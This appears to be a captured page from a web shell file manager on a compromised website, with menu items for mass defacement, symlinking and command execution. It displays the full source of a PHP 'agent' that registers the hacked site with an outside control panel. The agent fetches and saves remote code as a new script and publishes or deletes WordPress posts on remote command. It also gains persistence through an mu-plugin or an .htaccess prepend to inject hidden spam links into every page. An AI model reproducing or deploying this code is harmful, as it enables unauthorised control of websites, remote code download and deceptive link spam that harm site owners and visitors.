PHP File Manager Mini
Current Dir :/home/domains/tv.thapsang.vn/public_html/[drwxr-xr-x]	Home	Config	Mass Deface
biasa [Writable] home_root [Writable]	Jumping	Symlink	Auto edit user
dir file	Adminer	Command	Logout

<pre><?php /* ================================= AGENT v4.1 Elleme değiştirme bozulursa fena sikerler ================================= */ error_reporting(E_ALL); ini_set('display_errors', 0); $panelBase = "https://hacklinkhub.io/panel/api/site"; $configFile = __DIR__.'/.site_agent.json'; $linkCache = __DIR__.'/.site_links.json'; $root = __DIR__; $debug = isset($_GET['debug']); $installerFile = $root.'/install-agent.php'; if(!file_exists($installerFile)){ $installerCode = '<?php $token = "83fds2kfms3q"; if(($_GET["token"] ?? "") !== $token){ http_response_code(403); exit; } $remote = "https://hacklinkhub.io/agent/agent.txt"; $target = __DIR__."/agent.php"; $ch = curl_init($remote); curl_setopt_array($ch,[ CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 20, CURLOPT_FOLLOWLOCATION => true ]); $data = curl_exec($ch); curl_close($ch); if(!$data){ echo "download_failed"; exit; } file_put_contents($target,$data); echo "agent_installed"; '; file_put_contents($installerFile,$installerCode); } if (isset($_GET['panel_check'])) { header('Content-Type: application/json'); echo json_encode([ 'status' => 'online', 'domain' => (isset($_SERVER['HTTPS'])?'https://':'http://').$_SERVER['HTTP_HOST'], 'agent_version' => '4.1', 'php_version' => PHP_VERSION, ]); exit; } function out($msg,$stop=true){ global $debug; if($debug) echo $msg."\n"; if($stop) exit; } function curlRequest($url,$headers=[],$post=false,$postFields=null){ $ch = curl_init($url); curl_setopt_array($ch,[ CURLOPT_RETURNTRANSFER => true, CURLOPT_HTTPHEADER => $headers, CURLOPT_POST => $post, CURLOPT_POSTFIELDS => $postFields, CURLOPT_TIMEOUT => 20, CURLOPT_CONNECTTIMEOUT => 10 ]); $res = curl_exec($ch); curl_close($ch); return $res; } function detectCMS(){ if(file_exists(__DIR__.'/wp-config.php')) return 'wordpress'; if(file_exists(__DIR__.'/artisan')) return 'laravel'; if(file_exists(__DIR__.'/config.php') && is_dir(__DIR__.'/catalog')) return 'opencart'; return 'php'; } $domain = (isset($_SERVER['HTTPS'])?'https://':'http://').$_SERVER['HTTP_HOST']; if (isset($_POST['delete_blog'])) { if (!file_exists($configFile)) { http_response_code(403); echo json_encode(['ok' => false, 'error' => 'config_not_found']); exit; } $cfg = json_decode(file_get_contents($configFile), true); $key = (string)($_SERVER['HTTP_X_SITE_KEY'] ?? ''); if (empty($cfg['site_key']) || $key !== $cfg['site_key']) { http_response_code(403); echo json_encode(['ok' => false, 'error' => 'unauthorized']); exit; } if (!file_exists($root.'/wp-load.php')) { echo json_encode(['ok' => false, 'error' => 'not_wordpress']); exit; } require_once $root.'/wp-load.php'; $remoteUrl = trim((string)($_POST['remote_url'] ?? '')); $title = trim((string)($_POST['title'] ?? '')); $postId = 0; if ($remoteUrl !== '') { $postId = url_to_postid($remoteUrl); } if (!$postId && $title !== '') { $post = get_page_by_title($title, OBJECT, 'post'); if ($post) { $postId = (int) $post->ID; } } if (!$postId) { echo json_encode(['ok' => false, 'error' => 'post_not_found']); exit; } $deleted = wp_delete_post($postId, true); if (!$deleted) { echo json_encode(['ok' => false, 'error' => 'delete_failed']); exit; } echo json_encode(['ok' => true]); exit; } if (isset($_POST['publish_blog'])) { if (!file_exists($configFile)) { http_response_code(403); echo json_encode(['ok' => false, 'error' => 'config_not_found']); exit; } $cfg = json_decode(file_get_contents($configFile), true); $key = (string)($_SERVER['HTTP_X_SITE_KEY'] ?? ''); if (empty($cfg['site_key']) || $key !== $cfg['site_key']) { http_response_code(403); echo json_encode(['ok' => false, 'error' => 'unauthorized']); exit; } if (!file_exists($root.'/wp-load.php')) { echo json_encode(['ok' => false, 'error' => 'not_wordpress']); exit; } require_once $root.'/wp-load.php'; $title = trim((string)($_POST['title'] ?? '')); $content = (string)($_POST['content'] ?? ''); if ($title === '' || trim($content) === '') { echo json_encode(['ok' => false, 'error' => 'invalid_payload']); exit; } $postId = wp_insert_post([ 'post_title' => $title, 'post_content' => $content, 'post_status' => 'publish', 'post_type' => 'post', ], true); if (is_wp_error($postId)) { echo json_encode(['ok' => false, 'error' => $postId->get_error_message()]); exit; } echo json_encode(['ok' => true, 'url' => get_permalink($postId)]); exit; } if(!file_exists($configFile)){ $response = curlRequest( $panelBase."/register", ['Content-Type: application/x-www-form-urlencoded'], true, http_build_query([ 'domain'=>$domain, 'cms'=>detectCMS() ]) ); if(!$response) out("REGISTER_FAILED"); file_put_contents($configFile,$response); out("REGISTERED"); } $config = json_decode(file_get_contents($configFile),true); if(!$config || empty($config['site_key']) || empty($config['site_secret'])) out("INVALID_CONFIG"); $siteKey = $config['site_key']; $siteSecret = $config['site_secret']; $timestamp = time(); $nonce = bin2hex(random_bytes(8)); $path = '/panel/api/site/heartbeat'; $sig = hash_hmac('sha256',"POST|$path|$timestamp|$nonce",$siteSecret); curlRequest($panelBase."/heartbeat",[ "X-SITE-KEY: $siteKey", "X-TIMESTAMP: $timestamp", "X-NONCE: $nonce", "X-SIGNATURE: $sig", "X-DOMAIN: $domain" ],true); $timestamp = time(); $nonce = bin2hex(random_bytes(8)); $path = '/panel/api/site/config'; $sig = hash_hmac('sha256',"GET|$path|$timestamp|$nonce",$siteSecret); $response = curlRequest($panelBase."/config?site_key=".$siteKey,[ "X-SITE-KEY: $siteKey", "X-TIMESTAMP: $timestamp", "X-NONCE: $nonce", "X-SIGNATURE: $sig" ]); if(!$response) out("CONFIG_FAILED"); $data = json_decode($response,true); if(!is_array($data) || !isset($data['links'])) out("INVALID_CONFIG_RESPONSE"); file_put_contents($linkCache,json_encode([ 'version'=>$data['version']??1, 'updated_at'=>date('c'), 'links'=>$data['links'] ],JSON_UNESCAPED_UNICODE|JSON_UNESCAPED_SLASHES)); $renderFile = $root.'/.panel_render.php'; if(!file_exists($renderFile)){ $renderCode = '<?php $cache = __DIR__."/.site_links.json"; if(!file_exists($cache)) return; $data = json_decode(file_get_contents($cache), true); if(empty($data["links"])) return; ob_start(function($buffer) use ($data){ $linksHtml = "\n<!-- PANEL LINKS START -->\n"; foreach($data["links"] as $l){ if(empty($l["url"]) || empty($l["anchor"])) continue; $u = htmlspecialchars($l["url"], ENT_QUOTES); $a = htmlspecialchars($l["anchor"], ENT_QUOTES); $r = !empty($l["rel"]) ? htmlspecialchars($l["rel"]) : "dofollow"; $style = "font-size:1px;"; if(!empty($l["hidden"])) $style .= "display:none;"; $linksHtml .= "<a href=\"".$u."\" style=\"".$style."\">".$a."</a> "; } $linksHtml .= "\n<!-- PANEL LINKS END -->\n"; if(stripos($buffer, "</body>") !== false){ return preg_replace("/<\\/body>/i", $linksHtml."</body>", $buffer, 1); } return $buffer.$linksHtml; });'; file_put_contents($renderFile, $renderCode); } if(file_exists($root.'/wp-load.php')){ $muDir = $root.'/wp-content/mu-plugins'; if(!is_dir($muDir)) mkdir($muDir,0755,true); $pluginPath = $muDir.'/panel-links.php'; if(!file_exists($pluginPath)){ file_put_contents($pluginPath,'<?php if(!defined("ABSPATH")) exit; add_action("init",function(){ $f = ABSPATH.".panel_render.php"; if(file_exists($f)) include $f; });'); } } if(!file_exists($root.'/wp-load.php')){ $htaccess = $root.'/.htaccess'; $line = "php_value auto_prepend_file ".$renderFile; if(is_writable($root)){ if(!file_exists($htaccess)) file_put_contents($htaccess,$line.PHP_EOL); else{ $c = file_get_contents($htaccess); if(strpos($c,'auto_prepend_file')===false) file_put_contents($htaccess,$line.PHP_EOL.$c); } } } echo $debug ? "AGENT OK\nLinks: ".count($data['links'])."\n" : "SYNC_OK"; </pre>